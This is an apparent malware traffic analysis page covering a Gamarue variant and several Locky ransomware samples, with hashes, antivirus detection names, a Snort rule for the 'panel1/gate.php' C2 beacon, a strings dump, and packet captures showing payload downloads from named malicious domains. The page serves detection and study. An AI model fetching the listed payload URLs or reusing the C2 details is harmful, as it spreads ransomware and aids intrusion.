
PCAP Malware Traffic Sample Download Snort Rule Win.Trojan.Gamarue variant POST /panel1/gate.php

 

51 engines detected this file
SHA-256 3bf071be282d16696584af13dc38e1c730f127f1b49504408676225d42874e1e
File name AU.EXE
File size 572.5 KB
Last analysis 2017-11-29 21:23:27 UTC

Ad-Aware: Trojan.Crypt.Agent.BF
AegisLab: Gen.Variant.Razy!c
AhnLab-V3: Trojan/Win32.Locky.C2242537
ALYac: Trojan.Crypt.Agent.BF
Antiy-AVL: Trojan/Win32.TSGeneric
Arcabit: Trojan.Crypt.Agent.BF
Avast: Win32:Malware-gen
AVG: Win32:Malware-gen
Avira: TR/Crypt.Xpack.binkq
AVware: Trojan.Win32.Generic!BT
Baidu: Win32.Trojan.WisdomEyes.16070401.9500.9999
BitDefender: Trojan.Crypt.Agent.BF
CAT-QuickHeal: TrojanSpy.SpyEyes
Comodo: Backdoor.Win32.Poison.FYRG

 

References:

https://www.hybrid-analysis.com/sample/3bf071be282d16696584af13dc38e1c730f127f1b49504408676225d42874e1e?environmentId=100

https://www.virustotal.com/#/file/3bf071be282d16696584af13dc38e1c730f127f1b49504408676225d42874e1e/detection

Snort Rule:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC Win.Trojan.Gamarue variant outbound connection"; flow:to_server,established; content:"POST"; http_method; content:"panel1/gate.php"; content:" HTTP/1.1|0D 0A|Cache-Control: no-cache|0D 0A|Connection|3A|"; fast_pattern:only; content:"+"; depth:15; http_client_body; metadata:impact_flag red, policy security-ips drop, ruleset community, service http; sid:1234; rev:1;)

2017-11-29 19:34:59.673041 IP 192.168.1.102.50951 > 198.54.116.113.80: Flags [P.], seq 3095874245:3095874726, ack 2614075121, win 260, length 481: HTTP: GET /au.exe HTTP/1.1
E.. A.@….t…f.6tq…P..J…..P…….GET /au.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: evaroma.zone
Connection: Keep-Alive

2017-11-29 19:35:06.844873 IP 192.168.1.102.50959 > 198.54.116.113.80: Flags [P.], seq 3400751766:3400751989, ack 361817033, win 260, length 223: HTTP: POST /panel1/gate.php HTTP/1.0
E…B.@……..f.6tq…P..Z…..P…….POST /panel1/gate.php HTTP/1.0
Host: evaroma.zone
Connection: close
Content-Length: 80
Accept-Language: en-US
Content-Type: image/jpeg

UR.QQ…U..U.v#..S..Sp.Tvt#..Q..^w.U.v ..”qu’..^vvC..C..C.sC..%..U.._..WtuC..C..
2017-11-29 19:35:08.535037 IP 192.168.1.102.50960 > 198.54.116.113.80: Flags [P.], seq 85791915:85793375, ack 2118066358, win 260, length 1460: HTTP: POST /panel1/gate.php HTTP/1.0
E…B.@……..f.6tq…P….~? .P…….POST /panel1/gate.php HTTP/1.0
Host: evaroma.zone
Connection: close
Content-Length: 14075
Accept-Language: en-US
Content-Type: image/jpeg


Malware Trojan Downloader Dropper cubeupload.com PCAP file download traffic analysis

 

 

43 engines detected this file
SHA-256 b069e7d29889bcdcc61e7936ad4800d2563c8618135f40c50e4dbcdc9314f505
File name gfD4vo.jpg
File size 522.61 KB
Last analysis 2017-09-25 22:14:16 UTC

 

FILE 2 – Dropper

 

23 engines detected this file
SHA-256 214325a508b6354286f0ba47afdf998ea8c5b87012d6fac08ec0e7a996ac1999
File name 2602033098198832.exe
File size 266.49 KB
Last analysis 2017-09-25 22:34:21 UTC
Community score -11

 

2017-09-25 16:39:29.774994 IP 192.168.1.102.61160 > 75.75.75.75.53: 16676+ A? i.cubeupload.com. (34)
E..>…….2…fKKKK…5.*z.A$………..i
cubeupload.com…..
2017-09-25 16:39:29.812702 IP 192.168.1.102.56856 > 46.4.115.108.80: Flags [S], seq 1274466961, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….|…f..sl…PK……… ……………..
2017-09-25 16:39:29.934339 IP 192.168.1.102.56856 > 46.4.115.108.80: Flags [.], ack 217614345, win 256, length 0
E..(..@……..f..sl…PK…… P….b……..
2017-09-25 16:39:30.010343 IP 192.168.1.102.56856 > 46.4.115.108.80: Flags [P.], seq 0:489, ack 1, win 256, length 489: HTTP: GET /gfD4vo.jpg HTTP/1.1
E…..@…}….f..sl…PK…… P…….GET /gfD4vo.jpg HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: i.cubeupload.com
Connection: Keep-Alive

2017-09-25 16:39:30.748418 IP 192.168.1.102.56858 > 192.35.177.64.80: Flags [P.], seq 0:139, ack 1, win 256, length 139: HTTP: GET /roots/dstrootcax3.p7c HTTP/1.1
E…T+@…r….f.#.@…P..i|.\.wP…D^..GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com

 

2017-09-25 16:39:30.893843 IP 192.168.1.102.56858 > 192.35.177.64.80: Flags [.], ack 1219, win 251, length 0
E..(T,@…s1…f.#.@…P..j..\.9P………….
2017-09-25 16:39:30.924425 IP 192.168.1.102.61163 > 75.75.75.75.53: 19539+ A? isrg.trustid.ocsp.identrust.com. (49)
E..M……. …fKKKK…5.9.ZLS………..isrg.trustid.ocsp identrust.com…..
2017-09-25 16:39:30.942900 IP 192.168.1.102.56859 > 192.35.177.195.80: Flags [S], seq 1854319918, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4u.@…Q5…f.#…..Pn……… . ……………
2017-09-25 16:39:31.041398 IP 192.168.1.102.56859 > 192.35.177.195.80: Flags [.], ack 2211464567, win 256, length 0
E..(u.@…Q@…f.#…..Pn../..EwP….u……..
2017-09-25 16:39:31.042271 IP 192.168.1.102.56859 > 192.35.177.195.80: Flags [P.], seq 0:247, ack 1, win 256, length 247: HTTP: GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D HTTP/1.1
E…u.@…PH…f.#…..Pn../..EwP…….GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: isrg.trustid.ocsp.identrust.com

2017-09-25 16:39:31.187180 IP 192.168.1.102.61164 > 75.75.75.75.53: 10447+ A? ocsp.int-x3.letsencrypt.org. (45)
E..I…….#…fKKKK…5.5..(…………ocsp.int-x3.letsencrypt.org…..
2017-09-25 16:39:31.277686 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [P.], seq 295:812, ack 3052, win 256, length 517
E..-..@…}x…f..sl…..(….dJP….&………..c]..c!.=.AW….cb?.c.R.a…..&..(J$.k.q>?….N!D….w#…X.z.Hy.G..0.AH..”T$~9^..t…[.2…u)”…………U…h…..{.+.d……G.Z{..I\…….8…..{..+%g..).I…O..’…+*.5N.[C>..#…0c….I.y.T~!xy*….p7..1….*
._.X#…..t.o…a…-.i…a..).G…j…zm….4..9…..6…G<s.wX….EOx.x.h.G.{…..>.#q..K…..[.y…D….X…U….K*.’+..D…4…..r=L…..fw..y$i] ..7X….]..\.!.o..<..-fXW…~2..\….&…F..B.$_…\Q.]…..`+..#.:S*..g.5*..>…V…Q{…..S.{|.O…s..6]……].h…….G..%[3..8.+.6r~C.>|.v
2017-09-25 16:39:31.393111 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 5972, win 256, length 0
E..(..@….|…f..sl…..(….o.P………….
2017-09-25 16:39:31.394922 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 8892, win 256, length 0
E..(..@….{…f..sl…..(….{.P….Q……..
2017-09-25 16:39:31.395511 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 11812, win 256, length 0
E..(..@….z…f..sl…..(……P………….
2017-09-25 16:39:31.396583 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 14732, win 256, length 0
E..(..@….y…f..sl…..(……P………….
2017-09-25 16:39:31.397200 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 17652, win 256, length 0
E..(..@….x…f..sl…..(…..RP………….
2017-09-25 16:39:31.508500 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 20572, win 256, length 0
E..(..@….w…f..sl…..(……P…|………
2017-09-25 16:39:31.509234 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 23492, win 256, length 0
E..(..@….v…f..sl…..(…..”P…qI……..

2017-09-25 16:39:48.032574 IP 192.168.1.102.61165 > 75.75.75.75.53: 52627+ A? drazalier.net. (31)
E..;…….0…fKKKK…5.’.^………… drazalier.net…..
2017-09-25 16:39:48.181862 IP 192.168.1.102.56861 > 62.210.101.38.80: Flags [S], seq 436295889, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..45.@…^….f>.e&…P..X……. ……………..
2017-09-25 16:39:48.293504 IP 192.168.1.102.56861 > 62.210.101.38.80: Flags [.], ack 3080210756, win 256, length 0
E..(5.@…_ …f>.e&…P..X…IDP………….
2017-09-25 16:39:48.300187 IP 192.168.1.102.56861 > 62.210.101.38.80: Flags [P.], seq 0:499, ack 1, win 256, length 499: HTTP: GET /PO/2602033098198832.exe HTTP/1.1
E…5.@…]….f>.e&…P..X…IDP…….GET /PO/2602033098198832.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: drazalier.net
Connection: Keep-Alive

 

Bor.uz Locky Ransomware Malware NO C2 Traffic Analysis PCAP file download

24 engines detected this file
SHA-256 8feb981439774342fbe7c7a25c21d9cbae58f4cc13feb0ebf3657a85f2142158
File name YTkjdJH7w1.exe
File size 591 KB
Last analysis 2017-09-25 15:50:03 UTC

AegisLab: Ransom.Cerber.Smaly0!c
Avast: FileRepMalware
AVG: FileRepMalware
Baidu: Win32.Trojan.WisdomEyes.16070401.9500.9999
CrowdStrike Falcon: malicious_confidence_100% (W)
Cylance: Unsafe

2017-09-25 16:50:29.002420 IP 192.168.1.102.57680 > 75.75.75.75.53: 45408+ A? bor.uz. (24)
E..4…….”…fKKKK.P.5. #..`………..bor.uz…..
2017-09-25 16:50:29.529203 IP 192.168.1.102.56893 > 62.209.133.18.80: Flags [S], seq 2670765003, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4\.@….I…f>….=.P.0…….. ……………..
2017-09-25 16:50:29.719862 IP 192.168.1.102.56893 > 62.209.133.18.80: Flags [.], ack 1966844122, win 256, length 0
E..(\.@….T…f>….=.P.0..u;..P….A……..
2017-09-25 16:50:29.731330 IP 192.168.1.102.56893 > 62.209.133.18.80: Flags [P.], seq 0:479, ack 1, win 256, length 479: HTTP: GET /YTkjdJH7w1 HTTP/1.1
E…\.@….t…f>….=.P.0..u;..P…d~..GET /YTkjdJH7w1 HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: bor.uz
Connection: Keep-Alive

2017-09-25 16:50:32.505137 IP 192.168.1.102.56894 > 62.209.133.18.80: Flags [P.], seq 0:268, ack 1, win 256, length 268: HTTP: GET /favicon.ico HTTP/1.1
E..4]Y@….y…f>….>.P.E..j^e’P…….GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Host: bor.uz
Connection: Keep-Alive

 

 

======================================

BINARY STRINGS

++++++++++++++++++++++++++++++++++++++

 

This program cannot be run in DOS mode.
.text
`.rdata
@.data
.rsrc
=o)A
GGWPP
Proc
essMh@)A
hVirt
hvQ3r_Q
DSDS
CreateDesktopW
IsDialogMessageW
IsCharUpperA
LoadIconA
LoadMenuW
PostMessageA
LoadStringW
LoadCursorA
DrawStateW
MessageBoxA
GetClassLongA
DispatchMessageW
GetPropA
user32.dll
LeaveCriticalSection
GetModuleHandleW
GetFileAttributesW
FindNextFileA
GetConsoleAliasW
GetCurrentThread
SearchPathW
GetStringTypeA
GetProcAddress
GetExpandedNameW
GetLogicalDriveStringsA
GetProfileSectionA
GetCurrentProcess
LoadLibraryA
WaitNamedPipeA
GetTempPathW
WaitForSingleObject
GetModuleFileNameA
IsBadReadPtr
kernel32.dll

NEW LOCKY RANSOMWARE VARIANT g46mbrrzpfszonuk.onion NO C2 PCAP file download traffic analysis

49 engines detected this file
SHA-256 ce48b278f8b823c25b222a33027248299bff3cdc2a6bdb0fdceecb0922dd790a
File name jhdsgvc74
File size 653 KB
Last analysis 2017-09-25 08:23:44 UTC
Community score -78

ESET-NOD32: Win32/Filecoder.Locky.L
F-Secure: Trojan.RanSerKD.12397146
Fortinet: W32/Locky.FWSD!tr.ransom
GData: Trojan.RanSerKD.12397146
Ikarus: Trojan.Win32.Filecoder
K7AntiVirus: Trojan ( 0051497b1 )
K7GW: Trojan ( 0051497b1 )
Kaspersky: Trojan-Ransom.Win32.Locky.ztt

2017-09-25 17:50:32.217002 IP 192.168.1.102.58790 > 75.75.75.75.53: 46557+ A? ar-inversiones.com. (36)
E..@…….:…fKKKK…5.,……………ar-inversiones.com…..
2017-09-25 17:50:32.397644 IP 192.168.1.102.57127 > 37.247.122.52.80: Flags [S], seq 2979498304, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4M5@…KU…f%.z4.’.P…@…… ……………..
2017-09-25 17:50:32.546454 IP 192.168.1.102.57127 > 37.247.122.52.80: Flags [.], ack 2169675136, win 256, length 0
E..(M6@…K`…f%.z4.’.P…A.R..P….w……..
2017-09-25 17:50:32.556435 IP 192.168.1.102.57127 > 37.247.122.52.80: Flags [P.], seq 0:490, ack 1, win 256, length 490: HTTP: GET /jhdsgvc74 HTTP/1.1
E…M7@…Iu…f%.z4.’.P…A.R..P…0C..GET /jhdsgvc74 HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: ar-inversiones.com/jhdsgvc74
Connection: Keep-Alive

 

2017-09-25 17:52:34.606370 IP 192.168.1.102.50739 > 75.75.75.75.53: 28660+ A? lordmartins.com. (33)
E..=…….;…fKKKK.3.5.).-o…………lordmartins.com…..

 

2017-09-25 17:53:19.760276 IP 192.168.1.102.64353 > 75.75.75.75.53: 11634+ A? g46mbrrzpfszonuk.onion. (40)
E..D…….’…fKKKK.a.5.0..-r………..g46mbrrzpfszonuk.onion…..

NEW Locky Ransomware PCAP file download traffic analysis gokeenakte.top NO C2 Used

51 engines detected this file
SHA-256 8514a2eca4090f400a43c4af915eb3ef6e9c15dabe69716189e7c68c72cfa285
File name 1
File size 617 KB
Last analysis 2017-09-25 04:21:44 UTC
Community score -50

2017-09-25 17:31:45.176820 IP 192.168.1.102.57004 > 47.89.249.183.80: Flags [P.], seq 0:482, ack 1, win 256, length 482: HTTP: GET /url/1 HTTP/1.1
E..
p @……..f/Y…..P!Ke.`…P…….GET /url/1 HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: gokeenakte.top
Connection: Keep-Alive

2017-09-25 17:33:25.458134 IP 192.168.1.102.57009 > 91.203.5.162.80: Flags [S], seq 1347326132, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4H%@….#…f[……PPN…….. .k……………
2017-09-25 17:33:31.173039 IP 192.168.1.102.57005 > 40.70.221.249.443: Flags [F.], seq 2336, ack 4383, win 258, length 0
E..(M.@……..f(F……’Q-..P..P………….
2017-09-25 17:33:31.213749 IP 192.168.1.102.57005 > 40.70.221.249.443: Flags [.], ack 4384, win 258, length 0
E..(M.@……..f(F……’Q-..P..P………….
2017-09-25 17:33:31.459273 IP 192.168.1.102.57009 > 91.203.5.162.80: Flags [S], seq 1347326132, win 8192, options [mss 1460,nop,nop,sackOK], length 0
E..0H&@….&…f[……PPN……p. ………….
2017-09-25 17:33:36.338616 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [P.], seq 48:72, ack 49, win 32762, length 24
E..@Us@…(….f2..h…2V.kC~.0.P….7…0……#…$………..
2017-09-25 17:33:36.457114 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [.], ack 73, win 32756, length 0
E..(Ut@…(….f2..h…2V.k[~.0.P…h~……..
2017-09-25 17:33:43.473893 IP 192.168.1.102.57010 > 149.154.68.190.80: Flags [S], seq 1790950938, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4@N@……..f..D….Pj……… ……………..
2017-09-25 17:33:46.474293 IP 192.168.1.102.57010 > 149.154.68.190.80: Flags [S], seq 1790950938, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4@O@……..f..D….Pj……… ……………..
2017-09-25 17:33:52.477158 IP 192.168.1.102.57010 > 149.154.68.190.80: Flags [S], seq 1790950938, win 8192, options [mss 1460,nop,nop,sackOK], length 0
E..0@P@……..f..D….Pj…….p. ………….
2017-09-25 17:34:04.495275 IP 192.168.1.102.57011 > 91.203.5.162.80: Flags [S], seq 2489365195, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4H’@….!…f[……P.`…….. ..e…………..
2017-09-25 17:34:07.498299 IP 192.168.1.102.57011 > 91.203.5.162.80: Flags [S], seq 2489365195, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4H(@…. …f[……P.`…….. ..e…………..
2017-09-25 17:34:13.513209 IP 192.168.1.102.57011 > 91.203.5.162.80: Flags [S], seq 2489365195, win 8192, options [mss 1460,nop,nop,sackOK], length 0